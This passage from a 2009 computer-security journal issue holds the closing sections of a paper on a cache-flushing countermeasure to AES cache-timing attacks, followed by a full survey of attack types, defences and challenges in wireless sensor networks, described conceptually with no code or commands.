process by tapping the cache data. In order to increase
the efficiency of this approach, one can increase the
frequency of cache flushing. This would be a
customizable parameter in the proposed DCFimplementation. By further analyzing the DCF
algorithm, it would lead to more “cache-misses” than
“cache-hits”. The “cache-misses” would eventually berecovered by looking up into the RAM for data. The
“cache-misses” is the performance penalty we pay with
this approach. But with the computing capability we
have today with the high-end dual core CPUs, thisrefetching of data elements from the RAM, can be dealt
with.
It should be noted that complete cache disabling is
also an option [3], but in such scenarios the spy processmight as well start tapping the RAM for encrypted data.
Flushing the cache would rather confuse the spy process
and make life difficult for attackers to derive a fixed
pattern of the timing information and encrypted data
samples.
Another feature intended in DCF algorithm is to
Figure 6. AES timings, using Constant-Time AES algorithm, for 128 keys
and 128 inputs
ISSN 1947 5500113
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 120/215
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 121/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. August, 2009
axis shows the time taken to execute that particularinstruction. Fig. 8 shows the average time taken to fetch
the input data Pi from the cache for that particular
instruction xi0. Here, X axis shows the data in cache
memory and Y axis shows the time taken to fetch thatdata. Due to the constant time approach with the cache
flushing, Fig. 7 and Fig. 8 demonstrate that an average
time reaches to a constant value. Fig. 9 is the
combination of the timing graphs shown in Fig. 7 and 8
for fetching the data and the time taken to execute the
instruction to fetch that data.If we take the difference of maximum values of an
average time for fetching the data and the time to
execute an instruction to fetch that data, we will get very
negligible time difference, say ki. For any time
difference between the timing data and the reference
data, ki remains constant and too small due to cacheflushing. This implies that, with the constant time
information, it is not possible to determine the exact
time taken to encrypt/decrypt the data. The performance
of the DCF algorithm is found to be little bit slower than
the Rijndael algorithm. The performance penalty is due
to cache flushing that provokes the processor to searchthe missing data in the RAM or in a secondary disk. On
the other hand, the security provided against attackers
by the proposed DCF algorithm is pretty impressive.
V. SIMULATION RESULTS
Here is a brief description of DCF during execution of Rijndael algorithm. Assume that there is a huge data file
that’s being encrypted using the DCF algorithm. The
flowchart in Fig. 10 would portray a logical flow of
events. A huge file is read into a user-defined variable,
“buffer”. The password provided by the user is typically
stored as the encryption key. Rijndael initializes itself by
building the set of round tables and table lookups into itsdata structure which helps in processing the data in
buffer. A timer is initialized just before Rijndael starts
encrypting the data in the buffer. The time should be
initialized in nanoseconds. During encryption, Rijndael
puts the key and data together in the round operation.During various steps in the encryption process, the
random delays are introduced using Sleep(X) function toensure that the repeated set of instructions does not
portray the same execution timeline. Here, the amount
of time, the process needs to be suspended ‘X’, is
directly proportional to the total amount of time ‘T’
taken to process the chunk of data of size ‘S’. If thetimer becomes zero, flush or remove the data from the
Figure 10. Dynamic Cache Flushing Algorithm Flowchart
Figure 9. Graph showing the difference between the timing data and
reference data
ISSN 1947 5500115
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 122/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. August, 2009
cache by using the cacheflush() function. The timerwould be initialized with a random time that would
make the encryption process time more unpredictable
for the hacker. Reinitialize the timer with a random time
and perform the encryption with random delay until all
the data is processed (encrypted).
VI. CONCLUSION
We have seen that Rijndael is vulnerable to cache timing
attack. Beyond AES, such attacks are potentially
applicable to any implementation of a cryptographic
algorithm that performs data-dependent memory
accesses. The main weakness detected in the Rijndael
algorithm is the heavy use of table lookups which
dominate the running time and the table lookup indices.
The countermeasures described in this paper represent a
significant step towards developing a stable, attack-proof AES algorithm. The DCF algorithm simulates ascenario wherein the table lookups are accessed in
constant-time rather than in variable-time. This woulddisable any attacker from writing a spy program to brute
force the key and data out of the cache data stored
during the execution of the DCF algorithm. In the
implementation of the DCF algorithm, cache is flushed
periodically during encryption or decryption process.
This would disable the attacker from tapping the cache
for data. On the downside, there is a performance hit on
the encryption time, but on a brighter note, the DCF
algorithm stands strong against the cache timing attack.
REFERENCES
[1] J. Daemen and V. Rijmen, “AES Proposal: Rijndael, AES
Algorithm” Submission, September 3, 1999.
[2] Daniel J. Bernstein, “Cache-timing attacks on AES”, TheUniversity of Illinois at Chicago, IL 60607-7045, 2005.
[3] D.A. Osvik, A. Shamir and E. Tromer. “Cache attacks and
Countermeasures: the Case of AES”. In Cryptology ePrintArchive, Report 2005/271, 2005.
[4] Joseph Bonneau and Ilya Mironov, “Cache-Collision Timing
Attacks Against AES” , (Extended Version) revised 2005-11-20.
[5] Svelto, F.; Charbon, E.; Wilton, S.J.E, “Introduction to thespecial issue on the IEEE 2002 custom integrated circuits
conference”, University of Pavia.
[6] James Nechvatal, Elaine Barker, Lawrence Bassham, WilliamBurr, Morris Dworkin, James Foti, Edward Roback, “Report on
the Development of the Advanced Encryption Standard (AES)”,
October 2, 2000.[7] Colin Percival, “Cache Missing for Fun and Profit”, May 13,
2005.
[8] Bruce Schneier, Doug Whiting (2000-04-07). "A PerformanceComparison of the Five AES Finalists" (PDF/PostScript).
Retrieved on 2006-08-13.
[9] Niels Ferguson, Richard Schroeppel, Doug Whiting (2001). "Asimple algebraic representation of Rijndael" (PDF/PostScript).
Proceedings of Selected Areas in Cryptography, 2001, LectureNotes in Computer Science: pp. 103–111, Springer-Verlag.
Retrieved on 2006-10-06.
Authors Biography
Jalpa Bani is a M.S. student
of Computer Science atUniversity of Bridgeport. She
completed her undergraduation in ComputerEngineering from SaurashtraUniversity, Gujarat, India. Shehas a deep urge to know morein the fields of Artificial
Intelligence, ComputerNetworks, Database
Management System and Mobile Computing. During herunder graduation, she researched on Cyborg - an active areain applied Robotics. She continued her research quest byconcentrating on security vulnerabilities in network andwireless communication protocols; 1024-bit+encryption/decryption of data; and enhancing performance of
mobile database query engine. In April 2008, she publishedan innovative paper - "A New Dynamic Cache Flushing(DCF) Algorithm for Preventing Cache Timing Attack" at
IEEE Wireless Telecommunication Symposium (IEEE WTS2008), Pomona, California. The paper presented a uniquealgorithm to prevent cache timing attack on RijndaelAlgorithm. She also published a paper called "Adapting Anti-Plagiarism Tool into Coursework in Engineering Program," atAmerican Society for Engineering Education (ASEE) at
Austin, TX in June 2009. She achieved a “Best StudentPoster” Honorable Mention in ASEE NE Conference atBridgeport, CT in April 2009. She was honored with "Schoolof Engineering Academic Achievement Award” at Universityof Bridgeport in May 2009.
Syed S. Rizvi is a Ph.D.
student of Computer Science
and Engineering at Universityof Bridgeport . He received a
B.S. in Computer Engineering
from Sir Syed University of
Engineering and Technology
and an M.S. in Computer
Engineering from Old
Dominion University in 2001 and 2005, respectively. In the
past, he has done research on bioinformatics projects where
he investigated the use of Linux based cluster search engines
for finding the desired proteins in input and outputs sequences
from multiple databases. For last three year, his research
focused primarily on the modeling and simulation of wide
range parallel/distributed systems and the web based training
applications. Syed Rizvi is the author of 68 scholarly
publications in various areas. His current research focuses on
the design, implementation and comparisons of algorithms in
the areas of multiuser communications, multipath signals
detection, multi-access interference estimation, computational
complexity and combinatorial optimization of multiuser
receivers, peer-to-peer networking, network security, and
reconfigurable coprocessor and FPGA based architectures.
ISSN 1947 5500116
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 123/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
A Survey of Attacks, Security Mechanisms and
Challenges in Wireless Sensor Networks
Dr. G. Padmavathi,
Prof and Head,
Dept. of Computer Science,
Avinashilingam University for Women,
Coimbatore, India,
ganapathi.padmavathi@gmail.com
Mrs. D. Shanmugapriya,
Lecturer,
Dept. of Information Technology,
Avinashilingam University for Women,
Coimbatore, India,
ds_priyaa@rediffmail.com
Abstract—Wireless Sensor networks (WSN) is an emerging
technology and have great potential to be employed in
critical situations like battlefields and commercial
applications such as building, traffic surveillance, habitat
monitoring and smart homes and many more scenarios. One
of the major challenges wireless sensor networks face today
is security. While the deployment of sensor nodes in an
unattended environment makes the networks vulnerable to a
variety of potential attacks, the inherent power and memorylimitations of sensor nodes makes conventional security
solutions unfeasible. The sensing technology combined with
processing power and wireless communication makes it
profitable for being exploited in great quantity in future.
The wireless communication technology also acquires
various types of security threats. This paper discusses a wide
variety of attacks in WSN and their classification
mechanisms and different securities available to handle
them including the challenges faced.
Keywords-Wireless Sensor Network; Security Goal;
Security Attacks; Defensive mechanisms; Challenges
I. INTRODUCTION
Basically, sensor networks are applicationdependent. Sensor networks are primarily designed forreal-time collection and analysis of low level data inhostile environments. For this reason they are well suitedto a substantial amount of monitoring and surveillanceapplications. Popular wireless sensor network applicationsinclude wildlife monitoring, bushfire response, militarycommand, intelligent communications, industrial qualitycontrol, observation of critical infrastructures, smartbuildings, distributed robotics, traffic monitoring,examining human heart rates etc. Majority of the sensornetwork are deployed in hostile environments with active
intelligent opposition. Hence security is a crucial issue.One obvious example is battlefield applications wherethere is a pressing need for secrecy of location andresistance to subversion and destruction of the network.Less obvious but just as important security dependentapplications include:
• Disasters: In many disaster scenarios, especiallythose induced by terrorist activities, it may be
necessary to protect the location of casualties fromunauthorized disclosure
• Public Safety: In applications where chemical,biological or other environmental threats aremonitored, it is vital that the availability of thenetwork is never threatened. Attacks causing falsealarms may lead to panic responses or even worse
total disregard for the signals.
• Home Healthcare: In such applications, privacyprotection is essential. Only authorized usersshould be able to query and monitor the network.
The major contribution of this paper includesclassification of security attacks, security mechanisms andchallenges in Wireless Sensor Networks. Section 2 givesthe detailed information about the security goals inWireless Sensor Networks. Security attacks and theirclassification are discussed in section 3. Section 4discusses about the various security mechanisms. Majorchallenges faced are given in Section 5 followed by theconclusion section.
II. SECURITY GOALS FOR SENSOR NETWORKS
As the sensor networks can also operate in an adhocmanner the security goals cover both those of thetraditional networks and goals suited to the uniqueconstraints of adhoc sensor networks. The security goalsare classified as primary and secondary [5]. The primarygoals are known as standard security goals such asConfidentiality, Integrity, Authentication and Availability(CIAA). The secondary goals are Data Freshness, Self-Organization, Time Synchronization and SecureLocalization.
The primary goals are:
A. Data Confidentiality
Confidentiality is the ability to conceal messages froma passive attacker so that any message communicated viathe sensor network remains confidential. This is the mostimportant issue in network security. A sensor node shouldnot reveal its data to the neighbors.
ISSN 1947 5500117
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 124/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
2
B. Data Authentication
Authentication ensures the reliability of the message by
identifying its origin. Attacks in sensor networks do not
just involve the alteration of packets; adversaries can also
inject additional false packets [14]. Data authentication
verifies the identity of the senders and receivers. Data
authentication is achieved through symmetric orasymmetric mechanisms where sending and receiving
nodes share secret keys. Due to the wireless nature of the
media and the unattended nature of sensor networks, it is
extremely challenging to ensure authentication.
C. Data Integrity
Data integrity in sensor networks is needed to ensurethe reliability of the data and refers to the ability toconfirm that a message has not been tampered with,altered or changed. Even if the network has confidentialitymeasures, there is still a possibility that the data integrityhas been compromised by alterations. The integrity of thenetwork will be in trouble when:
• A malicious node present in the network injectsfalse data.
• Unstable conditions due to wireless channel causedamage or loss of data.[4]
D. Data Availability
Availability determines whether a node has the ability to
use the resources and whether the network is available for
the messages to communicate. However, failure of the
base station or cluster leader’s availability will eventually
threaten the entire sensor network. Thus availability is of
primary importance for maintaining an operational
network.
The Secondary goals are:
E. Data Freshness
Even if confidentiality and data integrity are assured, there
is a need to ensure the freshness of each message.
Informally, data freshness [4] suggests that the data is
recent, and it ensures that no old messages have been
replayed. To solve this problem a nonce, or another time-
related counter, can be added into the packet to ensure data
freshness.
F. Self-Organization
A wireless sensor network is a typically an ad hocnetwork, which requires every sensor node be independentand flexible enough to be self-organizing and self-healingaccording to different situations. There is no fixedinfrastructure available for the purpose of network management in a sensor network. This inherent featurebrings a great challenge to wireless sensor network security. If self-organization is lacking in a sensor network,the damage resulting from an attack or even the riskyenvironment may be devastating.
G. Time Synchronization
Most sensor network applications rely on some form of time synchronization. Furthermore, sensors may wish tocompute the end-to-end delay of a packet as it travelsbetween two pairwise sensors. A more collaborativesensor network may require group synchronization [4] fortracking applications.
H. Secure LocalizationOften, the utility of a sensor network will rely on its
ability to accurately and automatically locate each sensorin the network. A sensor network designed to locate faultswill need accurate location information in order topinpoint the location of a fault. Unfortunately, an attackercan easily manipulate nonsecured location information byreporting false signal strengths, replaying signals.
This Section has discussed about the security goals thatare widely available for wireless sensor networks and thenext section explains about the attacks that commonlyoccur on wireless sensor networks.
III. ATTACKS ON SENSOR NETWORKS
Wireless Sensor networks are vulnerable to securityattacks due to the broadcast nature of the transmissionmedium. Furthermore, wireless sensor networks have anadditional vulnerability because nodes are often placed ina hostile or dangerous environment where they are notphysically protected. Basically attacks are classified asactive attacks and passive attacks. Figure1 shows theclassification of attacks under general categories andFigure 2 shows the attacks classification on WSN.
ISSN 1947 5500118
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 125/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
3
Figure 1. General Classification of Security Attacks
Figure 2. Classification of Security Attacks on WSN
ISSN 1947 5500119
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 126/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
4
A. Passive Attacks
The monitoring and listening of the communicationchannel by unauthorized attackers are known as passiveattack. The Attacks against privacy is passive in nature.
1) Attacks against Privacy
The main privacy problem is not that sensor networksenable the collection of information. In fact, muchinformation from sensor networks could probably becollected through direct site surveillance. Rather, sensornetworks intensify the privacy problem because they makelarge volumes of information easily available throughremote access. Hence, adversaries need not be physicallypresent to maintain surveillance. They can gatherinformation at low-risk in anonymous manner. Some of the more common attacks[8] against sensor privacy are:
• Monitor and Eavesdropping: This is the mostcommon attack to privacy. By snooping to thedata, the adversary could easily discover thecommunication contents. When the traffic conveys
the control information about the sensor network configuration, which contains potentially moredetailed information than accessible through thelocation server, the eavesdropping can acteffectively against the privacy protection.
• Traffic Analysis: Even when the messagestransferred are encrypted, it still leaves a highpossibility analysis of the communication patterns.Sensor activities can potentially reveal enoughinformation to enable an adversary to causemalicious harm to the sensor network.
• Camouflage Adversaries: One can insert theirnode or compromise the nodes to hide in thesensor network. After that these nodes can copy asa normal node to attract the packets, then misroutethe packets, conducting the privacy analysis.
B. Active Attacks
The unauthorized attackers monitors, listens to andmodifies the data stream in the communication channel areknown as active attack. The following attacks are active innature.
1. Routing Attacks in Sensor Networks
2. Denial of Service Attacks
3. Node Subversion
4.
Node Malfunction5. Node Outage
6. Physical Attacks
7. Message Corruption
8. False Node
9. Node Replication Attacks
10. Passive Information Gathering
1) Routing Attacks in Sensor NetworksThe attacks which act on the network layer are called
routing attacks. The following are the attacks that happenwhile routing the messages.
a) Spoofed, altered and replayed routing
information
• An unprotected ad hoc routing is vulnerable tothese types of attacks, as every node acts as arouter, and can therefore directly affect routinginformation.
• Create routing loops
• Extend or shorten service routes
• Generate false error messages
• Increase end-to-end latency [3]
b) Selective Forwarding
A malicious node can selectively drop only certain
packets. Especially effective if combined with an attack that gathers much traffic via the node. In sensor networksit is assumed that nodes faithfully forward receivedmessages. But some compromised node might refuse toforward packets, however neighbors might start usinganother route.[3]
c) Sinkhole Attack
Attracting traffic to a specific node in called sinkholeattack. In this attack, the adversary’s goal is to attractnearly all the traffic from a particular area through acompromised node. Sinkhole attacks typically work bymaking a compromised node look especially attractive tosurrounding nodes. [3]
d) Sybil Attacks
A single node duplicates itself and presented in themultiple locations. The Sybil attack targets fault tolerantschemes such as distributed storage, multipath routing andtopology maintenance. In a Sybil attack, a single nodepresents multiple identities to other nodes in the network.Authentication and encryption techniques can prevent anoutsider to launch a Sybil attack on the sensor network.[3]
e) Wormholes Attacks
In the wormhole attack, an attacker records packets (orbits) at one location in the network, tunnels them toanother location, and retransmits them into the network.[3]
f) HELLO flood attacks
An attacker sends or replays a routing protocol’sHELLO packets from one node to another with moreenergy. This attack uses HELLO packets as a weapon toconvince the sensors in WSN. In this type of attack anattacker with a high radio transmission range andprocessing power sends HELLO packets to a number of sensor nodes that are isolated in a large area within a
ISSN 1947 5500120
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 127/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
5
WSN. The sensors are thus influenced that the adversary istheir neighbor. As a result, while sending the informationto the base station, the victim nodes try to go through theattacker as they know that it is their neighbor and areultimately spoofed by the attacker.[3]
2) Denial of Service
Denial of Service (DoS) is produced by theunintentional failure of nodes or malicious action. DoSattack is meant not only for the adversary’s attempt tosubvert, disrupt, or destroy a network, but also for anyevent that diminishes a network’s capability to provide aservice. In wireless sensor networks, several types of DoSattacks in different layers might be performed. At physicallayer the DoS attacks could be jamming and tampering, atlink layer, collision, exhaustion and unfairness, at network layer, neglect and greed, homing, misdirection, black holesand at transport layer this attack could be performed bymalicious flooding and de-synchronization. Themechanisms to prevent DoS attacks include payment fornetwork resources, pushback, strong authentication and
identification of traffic.[2]
3) Node SubversionCapture of a node may reveal its information including
disclosure of cryptographic keys and thus compromise thewhole sensor network. A particular sensor might becaptured, and information (key) stored on it might beobtained by an adversary. [6]
4) Node MalfunctionA malfunctioning node will generate inaccurate data
that could expose the integrity of sensor network especially if it is a data-aggregating node such as a clusterleader [6].
5)
Node OutageNode outage is the situation that occurs when a nodestops its function. In the case where a cluster leader stopsfunctioning, the sensor network protocols should be robustenough to mitigate the effects of node outages byproviding an alternate route [6].
6) Physical AttacksSensor networks typically operate in hostile outdoor
environments. In such environments, the small form factorof the sensors, coupled with the unattended and distributednature of their deployment make them highly susceptibleto physical attacks, i.e., threats due to physical nodedestructions. Unlike many other attacks mentioned above,physical attacks destroy sensors permanently, so the lossesare irreversible. For instance, attackers can extractcryptographic secrets, tamper with the associated circuitry,modify programming in the sensors, or replace them withmalicious sensors under the control of the attacker.
7) Message Corruption
Any modification of the content of a message by anattacker compromises its integrity.[9]
8) False NodeA false node involves the addition of a node by an
adversary and causes the injection of malicious data. An
intruder might add a node to the system that feeds falsedata or prevents the passage of true data. Insertion of malicious node is one of the most dangerous attacks thatcan occur. Malicious code injected in the network couldspread to all nodes, potentially destroying the wholenetwork, or even worse, taking over the network on behalf of an adversary.[9]
9) Node Replication Attacks Conceptually, a node replication attack is quite simple;
an attacker seeks to add a node to an existing sensornetwork by copying the nodeID of an existing sensor node.A node replicated in this approach can severely disrupt asensor network’s performance. Packets can be corrupted or
even misrouted. This can result in a disconnected network,false sensor readings, etc. If an attacker can gain physicalaccess to the entire network he can copy cryptographickeys to the replicated sensor nodes. By inserting thereplicated nodes at specific network points, the attackercould easily manipulate a specific segment of the network,perhaps by disconnecting it altogether.[1]
10) Passive Information Gathering
An adversary with powerful resources can collectinformation from the sensor networks if it is not encrypted.An intruder with an appropriately powerful receiver andwell-designed antenna can easily pick off the data stream.Interception of the messages containing the physicallocations of sensor nodes allows an attacker to locate the
nodes and destroy them. Besides the locations of sensornodes, an adversary can observe the application specificcontent of messages including message IDs, timestampsand other fields. To minimize the threats of passiveinformation gathering, strong encryption techniques needsto be used.[8]
This section explained about the attacks and theirclassification that widely happens on wireless sensornetworks. The next section discusses about the securitymechanisms that are used to handle the attacks.
IV. SECURITY MECHANISM
The security mechanisms are actually used to detect,prevent and recover from the security attacks. A widevariety of security schemes can be invented to countermalicious attacks and these can be categorized as high-level and low-level. Figure 3 shows the order of securitymechanisms.
ISSN 1947 5500121
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 128/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
6
Figure3: Security mechanisms
A. Low-Level Mechanism
Low-level security primitives for securing sensornetworks includes,
1. Key establishment and trust setup
2. Secrecy and authentication
3. Privacy
4. Robustness to communication denial of service
5. Secure routing
6. Resilience to node capture
1) Key establishment and trust setup
The primary requirement of setting up the sensor network is the establishment of cryptographic keys. Generally thesensor devices have limited computational power and thepublic key cryptographic primitives are too expensive tofollow. Key-establishment techniques need to scale tonetworks with hundreds or thousands of nodes. In addition,the communication patterns of sensor networks differ fromtraditional networks; sensor nodes may need to set up keyswith their neighbors and with data aggregation nodes. Thedisadvantage of this approach is that attackers whocompromised sufficiently and many nodes could alsoreconstruct the complete key pool and break the scheme.[1]
2) Secrecy and authentication.Most of the sensor network applications require
protection against eavesdropping, injection, and modificationof packets. Cryptography is the standard defense.Remarkable system trade-offs arise when incorporatingcryptography into sensor networks. For point-to-pointcommunication[12], end-to-end cryptography achieves ahigh level of security but requires that keys be set up amongall end points and be incompatible with passive participationand local broadcast. Link-layer cryptography with a network
wide shared key simplifies key setup and supports passiveparticipation and local broadcast, but intermediate nodesmight eavesdrop or alter messages. The earliest sensornetworks are likely to use link layer cryptography, becausethis approach provides the greatest ease of deploymentamong currently available network cryptographicapproaches.[6]
3) PrivacyLike other traditional networks, the sensor networks have
also force privacy concerns. Initially the sensor networks aredeployed for legitimate purpose might subsequently be usedin unanticipated ways. Providing awareness of the presenceof sensor nodes and data acquisition is particularly important.[1]
4) Robustness to communication denial of serviceAn adversary attempts to disrupt the network’s operation
by broadcasting a high-energy signal. If the transmission ispowerful enough, the entire system’s communication couldbe jammed. More sophisticated attacks are also possible; theadversary might inhibit communication by violating the802.11 medium access control (MAC) protocol by, say,transmitting while a neighbor is also transmitting or bycontinuously requesting channel access with a request-to-send signal.[1]
5)
Secure routingRouting and data forwarding is a crucial service forenabling communication in sensor networks. Unfortunately,current routing protocols suffer from many securityvulnerabilities. For example, an attacker might launch denial-of-service attacks on the routing protocol, preventingcommunication. The simplest attacks involve injectingmalicious routing information into the network, resulting inrouting inconsistencies. Simple authentication might guard
ISSN 1947 5500122
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 129/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
7
against injection attacks, but some routing protocols aresusceptible to replay by the attacker of legitimate routingmessages. [6]
6) Resilience to node captureOne of the most challenging issues in sensor networks is
resiliency against node capture attacks. In most applications,sensor nodes are likely to be placed in locations easilyaccessible to attackers. Such exposure raises the possibilitythat an attacker might capture sensor nodes, extractcryptographic secrets, modify their programming, or replacethem with malicious nodes under the control of the attacker.Tamper-resistant packaging may be one defense, but it’sexpensive, since current technology does not provide a highlevel of security. Algorithmic solutions to the problem of node capture are preferable.[1]
B. High-Level Mechanism
High-level security mechanisms for securing sensornetworks, includes secure group management, intrusiondetection, and secure data aggregation.
1) Secure group management Each and every node in a wireless sensor network is
limited in its computing and communication capabilities.However, interesting in-network data aggregation andanalysis can be performed by groups of nodes. For example,a group of nodes might be responsible for jointly tracking avehicle through the network. The actual nodes comprisingthe group may change continuously and quickly. Many otherkey services in wireless sensor networks are also performedby groups. Consequently, secure protocols for groupmanagement are required, securely admitting new groupmembers and supporting secure group communication. Theoutcome of the group key computation is normallytransmitted to a base station. The output must beauthenticated to ensure it comes from a valid group. [1]
2) Intrusion detectionWireless sensor networks are susceptible to many forms
of intrusion. Wireless sensor networks require a solution thatis fully distributed and inexpensive in terms of communication, energy, and memory requirements. The useof secure groups may be a promising approach fordecentralized intrusion detection.[1]
3) Secure data aggregationOne advantage of a wireless sensor network is the fine-
grain sensing that large and dense sets of nodes can provide.The sensed values must be aggregated to avoidoverwhelming amounts of traffic back to the base station.
For example, the system may average the temperature of ageographic region, combine sensor values to compute thelocation and velocity of a moving object, or aggregate data toavoid false alarms in real-world event detection. Dependingon the architecture of the wireless sensor network,aggregation may take place in many places in the network.All aggregation locations must be secured.[6]
V. CHALLENGES OF SENSOR NETWORKS
The nature of large, ad-hoc, wireless sensor networkspresents significant challenges in designing securityschemes. A wireless sensor network is a special network which has many constraint compared to a traditionalcomputer network.
A. Wireless Medium
The wireless medium is inherently less secure because itsbroadcast nature makes eavesdropping simple. Anytransmission can easily be intercepted, altered, or replayedby an adversary. The wireless medium allows an attacker toeasily intercept valid packets and easily inject maliciousones. Although this problem is not unique to sensornetworks, traditional solutions must be adapted to efficientlyexecute on sensor networks. [7]
B. Ad-Hoc Deployment
The ad-hoc nature of sensor networks means no structurecan be statically defined. The network topology is alwayssubject to changes due to node failure, addition, or mobility.
Nodes may be deployed by airdrop, so nothing is known of the topology prior to deployment. Since nodes may fail or bereplaced the network must support self-configuration.Security schemes must be able to operate within thisdynamic environment.
C. Hostile Environment
The next challenging factor is the hostile environment inwhich sensor nodes function. Motes face the possibility of destruction or capture by attackers. Since nodes may be in ahostile environment, attackers can easily gain physical accessto the devices. Attackers may capture a node, physicallydisassemble it, and extract from it valuable information (e.g.cryptographic keys). The highly hostile environmentrepresents a serious challenge for security researchers.
D. Resource Scarcity
The extreme resource limitations of sensor devices poseconsiderable challenges to resource-hungry securitymechanisms. The hardware constraints necessitate extremelyefficient security algorithms in terms of bandwidth,computational complexity, and memory. This is no trivialtask. Energy is the most precious resource for sensornetworks. Communication is especially expensive in terms of power. Clearly, security mechanisms must give special effortto be communication efficient in order to be energy efficient.[5]
E. Immense Scale
The proposed scale of sensor networks poses a significantchallenge for security mechanisms. Simply networking tensto hundreds of thousands of nodes has proven to be asubstantial task. Providing security over such a network isequally challenging. Security mechanisms must be scalableto very large networks while maintaining high computationand communication efficiency.
ISSN 1947 5500123
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 130/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8
F. Unreliable Communication
Certainly, unreliable communication is another threat tosensor security. The security of the network relies heavily ona defined protocol, which in turn depends oncommunication.[5]
• Unreliable Transfer: Normally the packet-basedrouting of the sensor network is connectionless and
thus inherently unreliable.• Conflicts: Even if the channel is reliable, the
communication may still be unreliable. This is due tothe broadcast nature of the wireless sensor network.
• Latency: The multi-hop routing, network congestionand node processing can lead to greater latency inthe network, thus making it difficult to achievesynchronization among sensor nodes.
G. Unattended Operation
Depending on the function of the particular sensornetwork, the sensor nodes may be left unattended for longperiods of time. There are three main cautions to unattendedsensor nodes [5]:
• Exposure to Physical Attacks: The sensor may bedeployed in an environment open to adversaries, badweather, and so on. The probability that a sensorsuffers a physical attack in such an environment istherefore much higher than the typical PCs, which islocated in a secure place and mainly faces attacksfrom a network.
• Managed Remotely:Remote management of asensor network makes it virtually impossible todetect physical tampering and physical maintenanceissues.
• No Central Management Point: A sensor network should be a distributed network without a centralmanagement point. This will increase the vitality of the sensor network. However, if designedincorrectly, it will make the network organizationdifficult, inefficient, and fragile.
Perhaps most importantly, the longer that a sensor is leftunattended the more likely that an adversary hascompromised the node.
VI. CONCLUSION
The deployment of sensor nodes in an unattendedenvironment makes the networks vulnerable. Wireless sensornetworks are increasingly being used in military,environmental, health and commercial applications. Sensornetworks are inherently different from traditional wirednetworks as well as wireless ad-hoc networks. Security is animportant feature for the deployment of Wireless SensorNetworks. This paper summarizes the attacks and theirclassifications in wireless sensor networks and also anattempt has been made to explore the security mechanismwidely used to handle those attacks. The challenges of Wireless Sensor Networks are also briefly discussed. This
survey will hopefully motivate future researchers to come upwith smarter and more robust security mechanisms and maketheir network safer.
REFERENCES
[1] Adrian Perrig, John Stankovic, David Wagner, “Security in WirelessSensor Networks” Communications of the ACM, Page53-57, year2004
[2] Al-Sakib Khan Pathan, Hyung-Woo Lee, Choong Seon Hong,“Security in Wireless Sensor Networks: Issues and Challenges”,
International conference on Advanced Computing Technologies, Page1043-1045, year 2006
[3] Chris Karlof, David Wagner, “Secure Routing in Wireless SensorNetworks: Attacks and Countermeasures”, AdHoc Networks(elsevier), Page: 299-302, year 2003
[4] Ian F. Akykildiz, Weilian Su, Yogesh Sankarasubramaniam, andErdal Cayirci, “A Survey on Sensor Networks”, IEEECommunication Magazine, year 2002
[5] John Paul Walters, Zhengqiang Liang, Weisong Shi, VipinChaudhary, “Wireless Sensor Network Security: A Survey”, Securityin Distributed, Grid and Pervasive Computing Yang Xiao (Eds),Page3-5, 10-15, year 2006
[6] Pathan, A.S.K.; Hyung-Woo Lee; Choong Seon Hong, “Security inwireless sensor networks: issues and challenges” Advanced
Communication Technology (ICACT), Page(s):6, year 2006
[7] Tahir Naeem, Kok-Keong Loo, Common Security Issues andChallenges in Wireless Sensor Networks and IEEE 802.11 WirelessMesh Networks, International Journal of Digital Content Technologyand its Applications, Page 89-90 Volume 3, Number 1, year 2009
[8] Undercoffer, J., Avancha, S., Joshi, A. and Pinkston, J. “Security forsensor networks”. In Proceedings of the CADIP ResearchSymposium, University of Maryland, Baltimore County, USA, year2002 http://www.cs.sfu.ca/~angiez/personal/paper/sensor-ids.pdf
[9] Zia, T.; Zomaya, A., “Security Issues in Wireless Sensor Networks”,Systems and Networks Communications (ICSNC) Page(s):40 – 40,year 2006
[10] Xiangqian Chen, Kia Makki, Kang Yen, and Niki Pissinou, SensorNetwork Security: A Survey, IEEE Communications Surveys &Tutorials, vol. 11, no. 2,page(s): 52-62, year 2009
[11]
Culler, D. E and Hong, W., “Wireless Sensor Networks”,Communication of the ACM, Vol. 47, No. 6, June 2004, pp. 30-33.
[12] D. Djenouri, L. Khelladi, and N. Badache, “A Survey of SecurityIssues in Mobile ad hoc and Sensor Networks,” IEEE Commun.Surveys Tutorials, vol. 7, pp. 2–28, year 2005.
[13] S. Schmidt, H. Krahn, S. Fischer, and D. Watjen, “A SecurityArchitecture for Mobile Wireless Sensor Networks,” in Proc. 1st
European Workshop Security Ad-Hoc Sensor Networks (ESAS) , 2004.
